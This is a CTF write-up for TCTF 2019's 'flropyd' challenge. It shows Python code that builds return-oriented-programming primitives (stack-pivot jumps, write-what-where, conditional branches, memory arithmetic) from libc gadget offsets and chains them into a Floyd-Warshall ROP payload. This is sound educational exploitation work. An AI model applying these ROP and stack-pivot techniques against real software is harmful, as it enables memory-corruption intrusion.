TCTF 2019 - flropyd (366pt)
advanced ROP
March 25, 2019
reversing
flropyd (366pt)
Reversing
Description: People always say that rop is turing complete, show me by implementing the Floyd-Warshall algorithm
system: ubuntu-18.04
update1: you can download libc here
update2: md5(libc.so.6) == 50390b2ae8aaa73c47745040f54e602f
Files: flropyd
Solution:
This was a super fun challenge. The program gives you the address of malloc
in libc and asks you to provide a ropchain that will “implement the Floyd-Warshall algorithm.”
The program checks this by first chosing a random, bounded integer N
(stored at 0x602060
) and then creating a random weighted edge matrix that starts at 0x602068
in memory.
The program then calls fork
and the child program severely sandboxes itself and then executes the ropchain. The parent program executes it’s own version of the Floyd-Warshall algorithm which converts the edge matrix into a shortest-distance matrix.
The edge matrix in the parent’s memory is compared to the child and if they are equal, the check succeeds. Then this process is repeated 9 more times to verify that the ropchain actually works and if all checks pass, you get the flag.
The edge matrix is always a 64x64 qword array but only the values up to N
are set during initialization.
In order to complete this challenge, we need to write a ropchain that does the following:
for a in range(N):
for b in range(N):
for c in range(N):
if edges[b][c] > edges[b][a] + edges[a][c]:
edges[b][c] = edges[b][a] + edges[a][c]
This is a fairly simple algorithm but some difficulties arise when trying to implement it via ROP.
My approach was to build up a set of ROP primatives that could perform progressively higher level operations.
The first task was to find a series of gadgets that could implement “jump if less than”. Since our ROP “instruction pointer” is actually just the stack pointer, we need to find some gadgets that can conditionally modify the stack pointer based on two arguments.
This was definitely the hardest part of the challenge. When the child program initially executes the ropchain, it has been copied onto the stack. However, the same ropchain also exists in the data section (it starts at 0x60a080
). If we can transition from executing the stack ropchain (with large 64 bit addresses) to the data section ropchain, we can use gadgets that just modifiy esp
and we can use absolute ropchain addresses.
This is my unconditional jump primative:
def jump(addr):
buf = ''
# dereference gadget
buf += p64(base + 0x00000000000439c8) # pop rax
buf += p64(addr)
# fix spacing
buf += p64(base + 0x000000000003eb0b) # pop rcx
buf += p64(base + 0x000000000003eb0b) # pop rcx
buf += p64(base + 0x00000000000941b1) # mov qword ptr [rsp + 8], rax ; call rcx
buf += p64(base + 0x0000000000003960) # pop rsp
buf += p64(0) # junk (gets overwritten)
return buf
It works by setting rax
and then writing rax
to rsp + 8
. It has the side effect of calling rcx
so beforehand, we need to set rcx
to a gaget that pops a single register so that we uncorrupt the stack. In this case, I just set rcx
to point to the pop rcx
gadget. Finally we hit pop rsp
which pops the value that we wrote with rax
and acts as a jump.
Next, I created a simple “write what where” gadget that allows me to put a value in memory:
def write_what_where(mem, val):
buf = ''
buf += p64(base + 0x000000000003eb0b) # pop rcx ; ret
buf += p64(val)
buf += p64(base + 0x0000000000001b96) # pop rdx
buf += p64(mem)
buf += p64(base + 0x00000000000a8094) # mov qword ptr [rdx], rcx ; ret
return buf
Then I was able to find a gadget that sets esp
and with some interesting logic, it is possible to conditionally set this value. I created the following primitive which compares the value in two memory locations and “jumps” to one address if the first is less than the other, or the second otherwise:
def if_less_than_mem_mem_better(mem, mem2, addr_lt, addr_gte):
buf = ''
# dereference second memory value and store in rdx
buf += p64(base + 0x00000000000439c8) # pop rax
buf += p64(mem2)
buf += p64(base + 0x0000000000145c98) # mov rax, qword ptr [rax]
buf += p64(base + 0x00000000001415dd) # mov rdx, rax
# dereference first memory value and store in rax
buf += p64(base + 0x00000000000439c8) # pop rax
buf += p64(mem)
buf += p64(base + 0x0000000000145c98) # mov rax, qword ptr [rax]
# perform subtraction
buf += p64(base + 0x00000000000438fd) # sub rax, rdx
# arithmetic shift to get 0 or -1
buf += p64(base + 0x0000000000134bfc) # sar rax, 6
buf += p64(base + 0x0000000000134bfc) # sar rax, 6
buf += p64(base + 0x0000000000134bfc) # sar rax, 6
# compute correct address for jump table
buf += p64(base + 0x000000000002155f) # pop rdi
buf += p64(8)
buf += p64(base + 0x0000000000023e6a) # pop rsi
buf += p64(0x602030)
buf += p64(base + 0x00000000001216de) # and rax, rdi ; or rax, rsi
# if lt, rax = 0x602038
# else, rax = 0x602030
buf += write_what_where(0x602038, addr_lt)
buf += write_what_where(0x602030, addr_gte)
# dereference gadget
buf += p64(base + 0x0000000000145c98) # mov rax, qword ptr [rax]
# set rdx to ret gadget
buf += p64(base + 0x0000000000001b96) # pop rdx
buf += p64(base + 0x00000000000008aa) # ret
# set stack pointer
buf += p64(base + 0x000000000003ecaa) # mov esp, eax ; mov rbp, r9 ; nop ; jmp rdx
return buf
This primative firsts sets rax
and rdx
to the values in the two memory locations. Then it performs sub rax, rdx
and shifts the result so that we end up with either all 1’s (-1 in two’s compliment) or all zeros.
Then it performs (rax & 0x8) + 0x602030
which sets rax
to point to 0x602038
if rax < rdx
otherwise it will point to 0x602030
. By putting the two stack addresses we would like to jump to in these corresponding memory locations, we can dereference it and call the mov esp, eax
gadget.
The only mov esp, eax
gadget also jumps to rdx
as a side effect so we can just set rdx
to point to a ret
gadget in order to preserve the stack.
Next, I found it useful to create a copy_memory
primative that can copy a value from one address to another. This was fairly simple:
def copy_memory(mem_from, mem_to):
buf = ''
buf += p64(base + 0x00000000000439c8) # pop rax
buf += p64(mem_from)
buf += p64(base + 0x0000000000145c98) # mov rax, qword ptr [rax]
buf += p64(base + 0x0000000000001b96) # pop rdx
buf += p64(mem_to)
buf += p64(base + 0x000000000003093c) # mov qword ptr [rdx], rax
return buf
In order to index into the edge array, I created a primative that would take two memory locations that hold index values and a third location that would receive the value of the edge array:
def index_edge_array(mem_idx1, mem_idx2, save_to):
buf = ''
# copy index1 to junk counter
buf += copy_memory(mem_idx1, 0x602058)
# compute (idx1 * 64)
buf += p64(base + 0x000000000002155f) # pop rdi
buf += p64(0x602058 + 5)
buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
# dereference temp into edi
# edi = (idx1 * 64)
buf += p64(base + 0x0000000000001b96) # pop rdx
buf += p64(0x602058)
buf += p64(base + 0x00000000001ab806) # mov edi, dword ptr [rdx]
# dereference idx2
# rax = idx2
buf += p64(base + 0x00000000000439c8) # pop rax
buf += p64(mem_idx2)
buf += p64(base + 0x0000000000145c98) # mov rax, qword ptr [rax]
# add together
# rax = idx2 + (idx1 * 64)
buf += p64(base + 0x00000000000a8473) # add rax, rdi
# save intermediate computation to temp memory
buf += p64(base + 0x0000000000001b96) # pop rdx
buf += p64(0x602058)
buf += p64(base + 0x000000000003093c) # mov qword ptr [rdx], rax
# shift left 3 times
buf += p64(base + 0x000000000002155f) # pop rdi
buf += p64(0x602058 + 5)
buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
# dereference temp into edi
# edi = (idx2 + (idx1 * 64)) * 8
buf += p64(base + 0x0000000000001b96) # pop rdx
buf += p64(0x602058)
buf += p64(base + 0x00000000001ab806) # mov edi, dword ptr [rdx]
# add edge base offset
buf += p64(base + 0x00000000000439c8) # pop rax
buf += p64(0x602068)
# rax = (idx2 + (idx1 * 64)) * 8 + 0x602068
buf += p64(base + 0x00000000000a8473) # add rax, rdi
# lookup the edge value at this address
buf += p64(base + 0x0000000000145c98) # mov rax, qword ptr [rax]
# save the value to the memory location
buf += p64(base + 0x0000000000001b96) # pop rdx
buf += p64(save_to)
buf += p64(base + 0x000000000003093c) # mov qword ptr [rdx], rax
return buf
This function performs *save_to = edges[*mem_idx1][*mem_idx2]
. I used the location at 0x602058
as scratch memory since the shl
gadget I found operated directly on memory values rather than register values.
Similarly, I wrote a primative that can save a value to the edge array. It is nearly identical:
def write_index_edge_array(mem_idx1, mem_idx2, load_from):
buf = ''
# copy index1 to junk counter
buf += copy_memory(mem_idx1, 0x602058)
# compute (idx1 * 64)
buf += p64(base + 0x000000000002155f) # pop rdi
buf += p64(0x602058 + 5)
buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
# dereference temp into edi
# edi = (idx1 * 64)
buf += p64(base + 0x0000000000001b96) # pop rdx
buf += p64(0x602058)
buf += p64(base + 0x00000000001ab806) # mov edi, dword ptr [rdx]
# dereference idx2
# rax = idx2
buf += p64(base + 0x00000000000439c8) # pop rax
buf += p64(mem_idx2)
buf += p64(base + 0x0000000000145c98) # mov rax, qword ptr [rax]
# add together
# rax = idx2 + (idx1 * 64)
buf += p64(base + 0x00000000000a8473) # add rax, rdi
# save intermediate computation to temp memory
buf += p64(base + 0x0000000000001b96) # pop rdx
buf += p64(0x602058)
buf += p64(base + 0x000000000003093c) # mov qword ptr [rdx], rax
# shift left 3 times
buf += p64(base + 0x000000000002155f) # pop rdi
buf += p64(0x602058 + 5)
buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
# dereference temp into edi
# edi = (idx2 + (idx1 * 64)) * 8
buf += p64(base + 0x0000000000001b96) # pop rdx
buf += p64(0x602058)
buf += p64(base + 0x00000000001ab806) # mov edi, dword ptr [rdx]
# add edge base offset
buf += p64(base + 0x00000000000439c8) # pop rax
buf += p64(0x602068)
# rax = (idx2 + (idx1 * 64)) * 8 + 0x602068
buf += p64(base + 0x00000000000a8473) # add rax, rdi
# move the edge pointer into edi
# (in a convoluted way)
buf += p64(base + 0x0000000000001b96) # pop rdx
buf += p64(0x602058)
buf += p64(base + 0x000000000003093c) # mov qword ptr [rdx], rax
buf += p64(base + 0x00000000001ab806) # mov edi, dword ptr [rdx]
# dereference the load_from address
buf += p64(base + 0x00000000000439c8) # pop rax
buf += p64(load_from)
buf += p64(base + 0x0000000000145c98) # mov rax, qword ptr [rax]
# save new edge value
buf += p64(base + 0x000000000003fdfa) # mov qword ptr [rdi], rax ; xor eax, eax
return buf
Finally, I needed a primative that could add two memory locations:
def add_mem_mem(mem_a, mem_b):
buf = ''
# load mem_a into edi
buf += p64(base + 0x0000000000001b96) # pop rdx
buf += p64(mem_a)
buf += p64(base + 0x00000000001ab806) # mov edi, dword ptr [rdx]
# load mem_b into rax
buf += p64(base + 0x00000000000439c8) # pop rax
buf += p64(mem_b)
buf += p64(base + 0x0000000000145c98) # mov rax, qword ptr [rax]
# add
buf += p64(base + 0x00000000000a8473) # add rax, rdi
# store in mem_a
buf += p64(base + 0x0000000000001b96) # pop rdx
buf += p64(mem_a)
buf += p64(base + 0x000000000003093c) # mov qword ptr [rdx], rax
return buf
and a primative that could increment a memory location:
def increment_memory(mem):
buf = ''
buf += p64(base + 0x000000000003eb0b) # pop rcx ; ret
buf += p64(mem + 0x77)
buf += p64(base + 0x00000000000ea224) # inc dword ptr [rcx - 0x77]
return buf
Using these primatives we can write some assembly-like pseudocode:
# memory address that store local variable values
VAR_A = 0x602040
VAR_B = 0x602048
VAR_C = 0x602050
TEMP_0 = 0x602018
TEMP_1 = 0x602020
# size of edge array
NUM = 0x602060
_rop_init_I_guess:
jump(<start>) # move to the ropchain in the data section
start:
write_what_where(VAR_A, 0) # var a = 0
a_loop:
write_what_where(VAR_B, 0) # var b = 0
b_loop:
write_what_where(VAR_C, 0) # var c = 0
c_loop:
# index into the edge array and save to memory
index_edge_array(VAR_A, VAR_C, TEMP_0) # temp_0 = e[c][a]
index_edge_array(VAR_B, VAR_A, TEMP_1) # temp_1 = e[a][b]
# temp_0 = e[c][a] + e[a][b]
add_mem_mem(TEMP_0, TEMP_1)
index_edge_array(VAR_B, VAR_C, TEMP_1) # temp_1 = e[c][b]
# if e[c][a] + e[c][b] < e[c][b] {CONT}{SKIP}
if_less_than_mem_mem_better(TEMP_0, TEMP_1, <cont>, <skip>)
cont:
# e[c][b] = e[c][a] + e[a][b]
write_index_edge_array(VAR_B, VAR_C, TEMP_0)
skip:
# c += 1
increment_memory(VAR_C)
if_less_than_mem_mem_better(VAR_C, NUM, <c_loop>, <inc_b>)
inc_b:
# b += 1
increment_memory(VAR_B)
if_less_than_mem_mem_better(VAR_B, NUM, <b_loop>, <inc_a>)
inc_a:
# a += 1
increment_memory(VAR_A)
if_less_than_mem_mem_better(VAR_A, NUM, <a_loop>, <done>)
done:
...
For the final exploit, I put in print statements to compute the correct label addresses and then I hardcoded them into the rop primative calls for the final buffer:
buf = ''
# spacing to get to the first return address
buf += 'a' * 0x18
# jump {START}
buf += jump(0x60a0d0)
print('LABEL START: 0x%x' % (buf_base + len(buf)))
buf += write_what_where(0x602040, 0) # var a = 0
print('LABEL A: 0x%x' % (buf_base + len(buf)))
buf += write_what_where(0x602048, 0) # var b = 0
print('LABEL B: 0x%x' % (buf_base + len(buf)))
buf += write_what_where(0x602050, 0) # var c = 0
print('LABEL C: 0x%x' % (buf_base + len(buf)))
# index into the edge array and save to memory
buf += index_edge_array(0x602040, 0x602050, 0x602018) # 0x602018 = e[c][a]
print('LABEL second index: 0x%x' % (buf_base + len(buf)))
buf += index_edge_array(0x602048, 0x602040, 0x602020) # 0x602020 = e[a][b]
print('LABEL add mem: 0x%x' % (buf_base + len(buf)))
buf += add_mem_mem(0x602018, 0x602020) # 0x602018 = e[c][a] + e[a][b]
print('LABEL third index: 0x%x' % (buf_base + len(buf)))
buf += index_edge_array(0x602048, 0x602050, 0x602020) # 0x602020 = e[c][b]
print('LABEL comparison: 0x%x' % (buf_base + len(buf)))
# if e[c][a] + e[c][b] < e[c][b] {CONT}{SKIP}
buf += if_less_than_mem_mem_better(0x602018, 0x602020, 0x60a630, 0x60a788)
print('LABEL CONT: 0x%x' % (buf_base + len(buf)))
buf += write_index_edge_array(0x602048, 0x602050, 0x602018)
print('LABEL SKIP: 0x%x' % (buf_base + len(buf)))
# c += 1
buf += increment_memory(0x602050)
# if (c < *num) {C}{INC_B}
buf += if_less_than_mem_mem_better(0x602050, 0x602060, 0x60a148, 0x60a890)
print('LABEL INC_B: 0x%x' % (buf_base + len(buf)))
# b += 1
buf += increment_memory(0x602048)
# if (b < *num) {B}{INC_A}
buf += if_less_than_mem_mem_better(0x602048, 0x602060, 0x60a120, 0x60a998)
print('LABEL INC_A: 0x%x' % (buf_base + len(buf)))
# a += 1
buf += increment_memory(0x602040)
# if (a < *num) {A}{DONE}
buf += if_less_than_mem_mem_better(0x602040, 0x602060, 0x60a0f8, 0x60aaa0)
print('LABEL DONE: 0x%x' % (buf_base + len(buf)))